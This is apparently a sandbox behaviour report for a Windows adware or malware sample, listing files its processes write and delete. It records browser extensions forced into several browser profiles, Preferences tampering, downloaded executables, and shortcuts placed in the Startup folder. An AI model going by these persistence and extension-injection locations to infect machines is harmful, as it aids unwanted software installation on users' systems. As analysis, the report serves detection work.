%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\G0623_s_80314.exe (19594639 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Program Files%\jstm\install_1410999454.tmp (6319 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ptc (9 bytes)
%Program Files%\jstm\juese.exe (12289 bytes)
%Documents and Settings%\All Users\Desktop\ç»Â色åâ€Âé—¨.lnk (587 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\Almanac_clnh_2014.8.3._126cl[1].exe (1947589 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OfficeAssist.0195.80.1015.exe (2265057 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\All Users\Desktop\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4NAZ85F\ext[1].7z (106408 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\OfficeAssist.0195.80.1015[1].exe (2265057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\F0916_s_30897[1].exe (9843602 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\pop.html (947 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\G0623_s_80314[1].exe (19594639 bytes)
%Program Files%\jstm\unist.exe (1624 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Preferences (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (94 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ç»Â色åâ€Âé—¨\ç»Â色åâ€Âé—¨.lnk (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\zz.js (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\background.html (223 bytes)
%Documents and Settings%\All Users\Start Menu\ç»Â色åâ€Âé—¨.lnk (587 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\index.js (212 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_128.png (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-16.png (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\All Users\Start Menu\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\img\icon_16.png (524 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\pop.js (282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\redirect.html (137 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\index.html (261 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-48.png (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F0916_s_30897.exe (9843602 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\¢ñnetert Hao¢ñ23.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\background.html (502 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\content.js (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\ç»Â色åâ€Âé—¨.lnk (611 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (93 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\common.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\jquery.min.js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\liebao\User Data\Default\Preferences (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360Chrome\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\manifest.json (937 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\_locales\zh_CN\messages.json (493 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\abalpgokkijabpacojnmblmjomlmfbop\1.0.0_0\manifest.json (861 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\ç»Â色åâ€Âé—¨.lnk (605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\jstm\config.ini (379 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\images\icon-128.png (143 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
%Documents and Settings%\%current user%\Application Data\360se6\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\css\base.css (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\360se6\User Data\Default\Extensions\mkifighandebjmnepiemnfdeienmhgai\1.0.0_0\js\redirect.js (648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\dhfoihfkmmaokjckgfloefmjobpgagng\1.0.0_0\res\js\background.js (380 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\Almanac_clnh_2014.8.3._126cl[2].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\G0623_s_80314[1].exe (0 bytes)
%Program Files%\jstm\install_1410999454.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\F0916_s_30897[1].exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\OfficeAssist.0195.80.1015[2].exe (0 bytes)
%Program Files%\jstm\ptc (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\ext[1].7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ext.7z (0 bytes)
The process OfficeAssist.0195.80.1015.exe:1628 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\FindProcDLL.dll (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\v6svc.dll (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\oem.ini (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\OfficeAssist.0195.80.1015.exe (37179 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\v6svc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\FindProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\oem.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse8.tmp\OfficeAssist.0195.80.1015.exe (0 bytes)
The process OfficeAssist.0195.80.1015.exe:448 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\demo.ppt (1644 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\updateself.exe (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\3.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\104.png (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\6.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_fg.png (256 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\setup.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\updateself.exe (2128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\2.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist.dll (7748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\utility\uninst.exe (5951 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\utility\uninst.exe (3361 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\文档美化大师\文档美化大师.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\setup.cfg (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\102.png (233 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\100.png (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\101.png (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\meihua.exe (2268 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\cfgs\setup.cfg (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\product.xml (334 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\文档美化大师\卸载.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\31.png (875 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\feature.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\103.png (346 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist64.dll (5900 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_bg.png (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\assistupdate.exe (9662 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\demo.ppt (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\meihua.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\25.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\assistupdate.exe (7726 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\5.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\11.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\10.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Kingsoft\WPSAssist\wpsassist64.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_polish.png (340 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\demo.ppt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\utility\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\setup.cfg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\cfgs\feature.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\utility (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\assistupdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_fg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist64.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\meihua.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\updateself.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\install_res\cgpb_polish.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c84a\product.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wpsassist\~8c8e6\wpsassist.dll (0 bytes)
The process fm4svr.exe:1392 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\qqtj2[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\qqtj1[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\qqtj1[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\cb16fabc\DMSet.Xml (214 bytes)
The Dropped deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U2EALEEE\qqtj1[1].htm (0 bytes)
The process fjwyusp.exe:1336 makes changes in the file system.
